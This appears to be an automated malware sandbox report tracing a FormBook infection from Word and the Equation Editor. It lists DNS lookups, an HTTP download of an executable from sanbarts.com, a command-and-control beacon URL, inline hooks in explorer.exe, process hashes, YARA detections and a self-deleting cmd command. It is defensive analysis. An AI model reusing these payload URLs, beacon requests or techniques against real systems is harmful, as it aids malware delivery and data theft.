                                                      May 27, 2022 21:20:09.065567970 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.104387999 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104424953 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104441881 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104460955 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104504108 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104521036 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104536057 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104552984 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104576111 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.104594946 CEST804917445.120.185.113192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 21:20:07.500580072 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
May 27, 2022 21:20:07.519690990 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
May 27, 2022 21:20:07.697839022 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
May 27, 2022 21:20:07.747270107 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
May 27, 2022 21:21:30.526065111 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
May 27, 2022 21:21:30.566380978 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
May 27, 2022 21:21:48.877341032 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
May 27, 2022 21:21:49.139980078 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
May 27, 2022 21:22:09.726602077 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8
May 27, 2022 21:22:09.749313116 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 21:20:07.500580072 CEST | 192.168.2.22 | 8.8.8.8 | 0xcd9 | Standard query (0) | sanbarts.com | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.697839022 CEST | 192.168.2.22 | 8.8.8.8 | 0xf72 | Standard query (0) | www.sanbarts.com | A (IP address) | IN (0x0001)
May 27, 2022 21:21:30.526065111 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.storyofsol.com | A (IP address) | IN (0x0001)
May 27, 2022 21:21:48.877341032 CEST | 192.168.2.22 | 8.8.8.8 | 0x1666 | Standard query (0) | www.createacarepack.com | A (IP address) | IN (0x0001)
May 27, 2022 21:22:09.726602077 CEST | 192.168.2.22 | 8.8.8.8 | 0x723c | Standard query (0) | www.paypal-caseid521.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 21:20:07.519690990 CEST | 8.8.8.8 | 192.168.2.22 | 0xcd9 | No error (0) | sanbarts.com |  | 194.9.94.86 | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.519690990 CEST | 8.8.8.8 | 192.168.2.22 | 0xcd9 | No error (0) | sanbarts.com |  | 194.9.94.85 | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.747270107 CEST | 8.8.8.8 | 192.168.2.22 | 0xf72 | No error (0) | www.sanbarts.com | 215ffbc1941f6023.7host.cn |  | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 21:20:07.747270107 CEST | 8.8.8.8 | 192.168.2.22 | 0xf72 | No error (0) | 215ffbc1941f6023.7host.cn |  | 45.120.185.113 | A (IP address) | IN (0x0001)
May 27, 2022 21:21:30.566380978 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | Name error (3) | www.storyofsol.com | none | none | A (IP address) | IN (0x0001)
May 27, 2022 21:21:49.139980078 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | www.createacarepack.com | sbsfe-p8.geo.mf0.yahoodns.net |  | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 21:21:49.139980078 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | sbsfe-p8.geo.mf0.yahoodns.net |  | 98.137.244.37 | A (IP address) | IN (0x0001)
May 27, 2022 21:22:09.749313116 CEST | 8.8.8.8 | 192.168.2.22 | 0x723c | Name error (3) | www.paypal-caseid521.com | none | none | A (IP address) | IN (0x0001)
                                                      • sanbarts.com
                                                      • www.sanbarts.com
                                                      • www.createacarepack.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 194.9.94.86 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:20:07.586997986 CEST | 2 | OUT | GET /cssati.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: sanbarts.com
                                                      Connection: Keep-Alive
May 27, 2022 21:20:07.626665115 CEST | 2 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx
                                                      Date: Fri, 27 May 2022 19:20:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: keep-alive
                                                      Location: http://www.sanbarts.com/cssati.exe
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 45.120.185.113 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:20:08.064167976 CEST | 3 | OUT | GET /cssati.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Connection: Keep-Alive
                                                      Host: www.sanbarts.com
May 27, 2022 21:20:08.378580093 CEST | 4 | IN | HTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Thu, 26 May 2022 00:40:19 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "4042e42c9970d81:0"
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      Date: Fri, 27 May 2022 19:20:07 GMT
                                                      Content-Length: 299113
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qJ$$$/{$%;$"y$3$f"$Rich$PELiFZ2p@sp.textYZ `.rdatazp^@@.datap@.ndata@.rsrct@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49175 | 98.137.244.37 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:21:49.331468105 CEST | 318 | OUT | GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
                                                      Host: www.createacarepack.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
May 27, 2022 21:21:49.504925966 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                                      Date: Fri, 27 May 2022 19:21:49 GMT
                                                      P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                      Vary: Accept-Encoding
                                                      Content-Length: 73
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Age: 0
                                                      Connection: close
                                                      Server: ATS
                                                      Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64
                                                      Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found


                                                      Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB


                                                      Target ID:0
                                                      Start time:21:20:14
                                                      Start date:27/05/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13f5b0000
                                                      File size:1423704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:2
                                                      Start time:21:20:17
                                                      Start date:27/05/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:4
                                                      Start time:21:20:21
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\word.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                      Imagebase:0x400000
                                                      File size:299113 bytes
                                                      MD5 hash:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
• Detection: 9%, Metadefender
                                                      • Detection: 62%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:5
                                                      Start time:21:20:23
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                      Imagebase:0x9a0000
                                                      File size:191488 bytes
                                                      MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 69%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:6
                                                      Start time:21:20:24
                                                      Start date:27/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                      Imagebase:0x9a0000
File size: 191488 bytes
MD5 hash: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 7
Start time: 21:20:30
Start date: 27/05/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xff040000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

Target ID: 8
Start time: 21:20:52
Start date: 27/05/2022
Path: C:\Windows\SysWOW64\wuapp.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\wuapp.exe
Imagebase: 0xb30000
File size: 35328 bytes
MD5 hash: C8EBA45CEF271BED6C2F0E1965D229EA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 9
Start time: 21:20:57
Start date: 27/05/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
Imagebase: 0x4a830000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly